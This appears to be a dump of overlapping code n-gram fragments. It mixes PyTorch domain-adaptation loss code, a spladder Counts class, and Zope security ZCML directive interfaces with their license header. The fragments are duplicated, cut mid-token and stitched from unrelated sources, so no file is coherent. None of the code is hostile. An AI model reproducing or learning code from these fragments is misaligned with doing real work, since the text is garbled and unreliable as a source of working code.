K_ZsZs", "weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05)", "D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp()", "sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs", "x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x =", "-1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') !=", "= torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft':", "+ gamma * iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups:", "Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = (", "loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label,", "return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum()", "======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) -", "Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def" ]
[]
[ "import numpy as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float')", "__init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges = np.zeros((0,", "def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges =", "seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges = np.zeros((0, 2),", "<filename>spladder/classes/counts.py import numpy as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,),", "numpy as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos", "as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos =", "np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,),", "class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float')", "Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges", "self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges = np.zeros((0, 2), dtype='float')" ]
[ "= zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"), required=False,", "content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for", "= zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this content", "THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED", "for this factory in the ZMI factory identification scheme. If not given, defaults", "required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names", "any names provided directly in the attributes attribute or any names defined by", "the class to be publicly viewable (that is, requires the zope.Public permission). Only", "identification scheme. If not given, defaults to the literal string given as the", "GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface", "This argument says that this content class should be configured in the same", "required to access or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes", "INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST", "is. If this argument is specified, no other argument can be used.\"\"\"), required=False,", "the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require", "methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens(", "used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to", "modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This", "title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI factory identification scheme.", "= 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens,", "value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the permission to", "methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes", "can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by", "PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE", "NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND", "(that is, requires the zope.Public permission). Only one of the following two attributes", "ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE,", "OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. #", "required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \"", "= zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by", "attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(),", "\"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the", "the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy", "set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class", "defaults to the literal string given as the content directive's 'class' attribute.\"\"\"), required=False,", "zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class", "same way the specified class' security is. If this argument is specified, no", "accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This", "like this class\"), description=_(\"\"\" This argument says that this content class should be", "names provided directly in the attributes attribute or any names defined by interfaces", "the attributes attribute or any names defined by interfaces listed in the interface", "way the specified class' security is. If this argument is specified, no other", "title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this", "GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import", "title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\" \" of a", "content' menu\" \" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"),", "Access \" u\"will be provided to all of the names defined by the", "unconditionally allowed to any names provided directly in the attributes attribute or to", "# ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ =", "the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission", "title=_(\"Attributes that can be set\"), description=_(\"This is a list of attributes that can", "publicly viewable (that is, requires the zope.Public permission). Only one of the following", "the names in a given Interface require a given permission for access. \"\"\"", "names or the names in a given Interface require a given permission for", "attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos", "specified by the schema can be set\"), description=_(\"The listed schemas' properties can be\"", "listed interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema", "zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"), description=_(\"The listed schemas'", "directive's class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or", "directly in the attributes attribute or any names defined by interfaces listed in", "Contributors. # All Rights Reserved. # # This software is subject to the", "description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\",", "description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), )", "id that will be required to access or mutate the attributes and methods", "statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare", "AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT", "as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\"", "a list of attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(),", "= zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and methods\"", "value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\"", "AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED", "attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(),", "= zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\" \"", "interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used", "class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's class attribute", "value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or", "be provided to all of the names defined by the \" u\"interface(s). Multiple", "not given, defaults to the literal string given as the content directive's 'class'", "# All Rights Reserved. # # This software is subject to the provisions", "= Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \" u\"will", "IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING,", "access to. Access \" u\"will be provided to all of the names defined", "scheme. If not given, defaults to the literal string given as the content", "to the provisions of the Zope Public License, # Version 2.1 (ZPL). A", "THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR", "zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and methods\" \"", "attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface", "to provide access to. Access \" u\"will be provided to all of the", "this argument is specified, no other argument can be used.\"\"\"), required=False, ) class", "that the a specified list of names or the names in a given", "be publicly viewable (that is, requires the zope.Public permission). Only one of the", "be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces'", "the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\"", "argument is specified, no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface):", "names defined by interfaces listed in the interface attribute. \"\"\" attributes = Tokens(", "is subject to the provisions of the Zope Public License, # Version 2.1", ") class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or the", "or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes", "used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"),", "attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes", "management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what", "required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access", "content directive's class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One", "ZMI factory identification scheme. If not given, defaults to the literal string given", "this content class should be configured in the same way the specified class'", "Rights Reserved. # # This software is subject to the provisions of the", "implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True,", "FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML", "modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and", "in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide", "\"\"\" Declare a part of the class to be publicly viewable (that is,", "= zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be required", "Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission", "class given by the content directive's class attribute implements a given interface \"\"\"", "title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface):", "from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ =", "\"\"\"Indicate that the a specified list of names or the names in a", "interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access", "permission to access selected module attributes The given permission is required to access", "be required to access or mutate the attributes and methods specified.\"\"\"), required=False, )", "can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the", "this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a", "list of attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), )", "\"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface):", "does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module =", "# # This software is subject to the provisions of the Zope Public", "can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected", "permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by", "PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__", "interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema =", "by id that will be required to access or mutate the attributes and", "# This software is subject to the provisions of the Zope Public License,", "u\"will be provided to all of the names defined by the \" u\"interface(s).", "requires the zope.Public permission). Only one of the following two attributes may be", "required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the permission to require.\")", "attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"),", "listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject(", "LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS", "\"\"\"Declare that the class given by the content directive's class attribute implements a", "content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in", "class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally allowed to", "description of what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security", "required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify", "\"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED,", "accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND", "the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable", "one of the following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens(", "selected module attributes The given permission is required to access any names provided", "\"\"\"Allow access to selected module attributes Access is unconditionally allowed to any names", "\" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified", "\"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields", "security is. If this argument is specified, no other argument can be used.\"\"\"),", "to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access", "the same way the specified class' security is. If this argument is specified,", "suitable for use in the 'add content' menu\" \" of a management interface\"),", "zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements", "software is subject to the provisions of the Zope Public License, # Version", "object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the", "attribute or any names defined by interfaces listed in the interface attribute. \"\"\"", "\" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\"", "can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this", "a part of the class to be publicly viewable (that is, requires the", "import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about", "class' security is. If this argument is specified, no other argument can be", "= Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission =", "value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be", "factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module", "Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany", "2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS", "be configured in the same way the specified class' security is. If this", "description=(u\"Interfaces whos names to provide access to. Access \" u\"will be provided to", "menu\" \" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer", "by the content directive's class attribute implements a given interface \"\"\" interface =", "this factory in the ZMI factory identification scheme. If not given, defaults to", ") class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\",", "about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True)", "\"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False,", "that the class given by the content directive's class attribute implements a given", "zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _", "interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \"", "and methods\"), description=_(\"This is a list of attributes and methods\" \" that can", "properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like", "in the ZMI factory identification scheme. If not given, defaults to the literal", "from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make", ") set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list", "of the class to be publicly viewable (that is, requires the zope.Public permission).", "argument says that this content class should be configured in the same way", "= zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to", "title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be required to access", "description=_(\"This is a list of attributes and methods\" \" that can be accessed.\"),", "= zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI factory", "should be configured in the same way the specified class' security is. If", "related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from", "zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema", "specified, no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare", "be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"),", "access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide", "is required to access any names provided directly in the attributes attribute or", "security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module", "module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow", "SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED #", "\"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will", "given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() )", "= zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), )", "of attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes", "required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add", "title=_(\"The attributes specified by the schema can be set\"), description=_(\"The listed schemas' properties", "IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's class attribute implements", "be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), )", "other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part", "given as the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"),", "a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the", "access to selected module attributes Access is unconditionally allowed to any names provided", "value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says", "required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module attributes The given", "Interface require a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\"", "permission). Only one of the following two attributes may be used. \"\"\" attributes", "value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to.", "any names provided directly in the attributes attribute or to any names defined", "to access selected module attributes The given permission is required to access any", "'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields", "value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the", "interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class", "the permission by id that will be required to access or mutate the", "directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface", "class IRequire(Interface): \"\"\"Require a permission to access selected module attributes The given permission", "from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from", "Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. #", "'add content' menu\" \" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID(", "description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"),", "title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \" u\"will be provided", "value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \"", "for use in the 'add content' menu\" \" of a management interface\"), required=False,", ") class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's class", "title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected", "# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.", "import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from", "listed in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to", "import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import", "import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import", "architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields", "to selected module attributes Access is unconditionally allowed to any names provided directly", "to access any names provided directly in the attributes attribute or any names", "WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF", "like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this", "names defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False)", "the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access", "given, defaults to the literal string given as the content directive's 'class' attribute.\"\"\"),", "attributes attribute or to any names defined by interfaces listed in the interface", "provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to", "required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's", "value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a", "to the literal string given as the content directive's 'class' attribute.\"\"\"), required=False, )", ") class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be publicly", "zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml", "two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), )", "factory identification scheme. If not given, defaults to the literal string given as", "in the attributes attribute or to any names defined by interfaces listed in", "description=_(\"Text suitable for use in the 'add content' menu\" \" of a management", "License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this", "of the names defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"),", "class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or the names", "permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be", "set\"), description=_(\"This is a list of attributes that can be\" \" modified/mutated.\"), required=False,", "PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n", "value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module attributes The", "zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface):", "identifier for this factory in the ZMI factory identification scheme. If not given,", "that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The", "or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified", "of what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations", "title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission", "string given as the content directive's 